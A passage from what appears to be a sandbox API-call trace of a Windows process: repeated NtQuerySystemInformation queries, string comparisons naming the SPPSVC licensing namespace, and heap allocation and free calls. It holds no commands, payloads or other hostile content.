Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0271.942] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0271.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0271.951] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0271.959] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806430 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9c60 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026c71c540 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71bc80 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c685170 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889170 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c685560 [0271.971] GetProcessHeap () returned 0x2026c630000 [0271.971] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9b90 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c685170 | out: hHeap=0x2026c630000) returned 1 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026d2edcd0 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xf4) returned 0x2026d64ded0 [0271.972] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd58 | out: phModule=0xc751dfdd58*=0x7ffcea380000) returned 1 [0271.972] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0271.972] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889870 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d7915c0 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806590 [0271.972] GetProcessHeap () returned 0x2026c630000 [0271.972] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9d30 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x38) returned 0x2026d889730 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8895b0 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71bc80 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c685560 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9b90 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889170 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d64ded0 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7915c0 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806590 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9d30 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889870 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, 